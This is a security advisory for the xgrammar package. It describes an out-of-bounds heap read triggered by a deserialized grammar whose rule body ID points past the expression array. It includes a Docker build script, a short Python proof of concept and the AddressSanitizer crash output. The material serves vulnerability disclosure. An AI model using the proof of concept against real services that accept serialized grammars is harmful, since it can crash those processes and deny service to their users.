All advisories

Out-of-Bounds Read Through Deserialized Rule Body Expression IDs

mlc-ai/xgrammar / GHSA-37rw-g9gr-454q

Affected packages

xgrammar pip
Affected versions>= 0.1.23
Patched versionsNot specified

Description

Out-of-Bounds Read Through Deserialized Rule Body Expression IDs

Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730

Summary

At the assessed untagged revision f07ca3c, a caller that can submit a serialized grammar can make a rule's body_expr_id refer outside the grammar's expression arena. Grammar::DeserializeJSON accepts the integer because generic reflection deserialization checks JSON shape and C++ field types, but it does not restore the cross-field invariant that every rule body must name an existing expression. When that grammar is compiled, the first in-place optimizer uses the invalid ID as an unchecked vector index. Changing the one-rule grammar's body ID from 2 to 3 produces a four-byte AddressSanitizer heap-buffer-overflow read immediately beyond a three-element vector and aborts the process.

This demonstrates a memory-safety and process-availability failure for applications that deserialize attacker-influenced grammars and then compile or otherwise consume them. It does not by itself demonstrate disclosure of useful data, code execution, or a network attack surface; the attacker must already be able to reach an application path that accepts serialized XGrammar objects.

The reflection-based grammar deserializer first appears in v0.1.23. The exact InPlaceGrammarRewriter sink used here was introduced later and is present without this validation in the source-inspected v0.2.6rc1 and v0.2.6rc2 tags. I reproduced the failure at revision f07ca3c; I did not runtime-test every intermediate release, and no fixed release was established.

Detail

Grammar::Impl represents these two concepts independently in cpp/grammar_impl.h:

  • rules_ is a vector of Rule records, each containing a signed body_expr_id.
  • grammar_expr_indptr_ has one entry per expression and maps an expression ID to its record in grammar_expr_data_.

If grammar_expr_indptr_.size() is three, the only valid expression IDs are 0, 1, and 2. A rule body must therefore satisfy:

0 <= body_expr_id < grammar_expr_indptr_.size()

For root ::= "a", serialization creates three expressions and the root rule normally names expression 2. The PoC changes only rules[0][1], the serialized body_expr_id, to 3; the expression arena itself remains unchanged and structurally well-typed.

The source-to-sink path is:

  1. Grammar::DeserializeJSON in cpp/grammar.cc calls AutoDeserializeJSON. Reflection reconstructs rules_, grammar_expr_data_, and grammar_expr_indptr_, but it has no semantic relationship that would compare each rule body with the expression count. Deserialization therefore returns a non-null Grammar containing the caller-selected value 3.
  2. GrammarCompiler::CompileGrammar copies the malformed grammar and invokes GrammarOptimizer. Its first pass, ByteStringFuser, derives from InPlaceGrammarRewriter in cpp/grammar_functor.cc.
  3. InPlaceGrammarRewriter::Apply sizes memo_ to builder_.NumGrammarExprs(), which is three in the PoC, then reads the root rule's body_expr_id and calls VisitExpr(3).
  4. VisitExpr uses that ID as memo_[expr_id] before GetGrammarExpr can perform even its own debug assertion:
int32_t VisitExpr(int32_t expr_id) {
  XGRAMMAR_DCHECK(expr_id < static_cast<int32_t>(memo_.size()));
  if (memo_[expr_id] != -1) {
    return memo_[expr_id];
  }

The check is not input validation. XGRAMMAR_DCHECK is compiled out when the default XGRAMMAR_ENABLE_INTERNAL_CHECK=OFF setting is used, including the reproduced CMake Debug build. It also checks only the upper bound: a negative body_expr_id would satisfy expr_id < memo_.size() even if internal checks were enabled. The subsequent std::vector::operator[] performs no release-mode bounds check, so ID 3 reads the first four bytes beyond the 12-byte allocation.

The same semantic gap exists when a Grammar is nested inside CompiledGrammar. At the assessed revision, DeserializeJSONValue in cpp/compiled_grammar.cc also discards the structural error returned by AutoDeserializeJSONValue for the nested grammar. Structural error propagation and semantic validation are distinct requirements: propagating the generic decode result is necessary, but a well-typed integer such as 3 still needs the rule-to-expression range check.

Several nearby checks do not prevent this trigger. Grammar::Impl::GetGrammarExpr has a debug-only range assertion, but this PoC reaches memo_[expr_id] first. The tokenizer has no role in validating grammar AST references, and disabling compiler caching does not alter the optimizer path. The root cause is therefore the absence of release-mode semantic validation at the deserialization trust boundary, not an optimizer-specific failure to recover from an invalid private AST.

Reproduce

Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.

The following disposable container pins the assessed revision, builds with AddressSanitizer while leaving XGrammar's internal debug checks at their default disabled setting, mutates only the root rule's body ID, and compiles the restored grammar:

docker run --rm -i python:3.12-slim-bookworm bash <<'DOCKER'
set -eux
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
python -m pip install -q --index-url https://download.pytorch.org/whl/cpu torch
python -m pip install -q scikit-build-core apache-tvm-ffi pydantic transformers numpy typing-extensions
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git rev-parse HEAD
git submodule update --init --recursive --quiet
ASAN_OPTIONS=verify_asan_link_order=0:detect_leaks=0 \
CXXFLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
LDFLAGS='-fno-lto -fsanitize=address' \
  python -m pip install -q --config-settings=cmake.build-type=Debug --no-build-isolation --no-deps .
cat > repro.py <<'PY'
import json
import xgrammar as xgr

obj = json.loads(xgr.Grammar.from_ebnf('root ::= "a"').serialize_json())
assert len(obj["grammar_expr_indptr"]) == 3
assert obj["rules"][0][1] == 2
obj["rules"][0][1] = 3
grammar = xgr.Grammar.deserialize_json(json.dumps(obj))
tokenizer = xgr.TokenizerInfo(["a"])
xgr.GrammarCompiler(tokenizer, max_threads=1, cache_enabled=False).compile_grammar(grammar)
PY
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:handle_segv=2:use_sigaltstack=0:disable_coredump=1 \
LD_PRELOAD="$(g++ -print-file-name=libasan.so)" \
python repro.py
DOCKER

I independently rebuilt and ran this input at the assessed revision. AddressSanitizer reported a four-byte heap-buffer-overflow read at the end of the three-element memo_ allocation. In a Debug-symbolized build, the decisive portion is:

ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 4
    #0 in xgrammar::InPlaceGrammarRewriter::VisitExpr(int)
    #1 in xgrammar::InPlaceGrammarRewriter::Apply(xgrammar::Grammar*)
    #2 in xgrammar::ByteStringFuser::Apply(xgrammar::Grammar*)
0 bytes to the right of 12-byte region
SUMMARY: AddressSanitizer: heap-buffer-overflow in xgrammar::InPlaceGrammarRewriter::VisitExpr(int)
ABORTING

Compiler optimization can inline VisitExpr, in which case ASan attributes the same read to ByteStringFuser::Apply; the allocation size, invalid index, and four-byte read are unchanged. A normal unmodified serialization is the negative control: its body ID remains 2, deserialization succeeds, and compilation completes.

Credit

Zheng Yu @ Depthfirst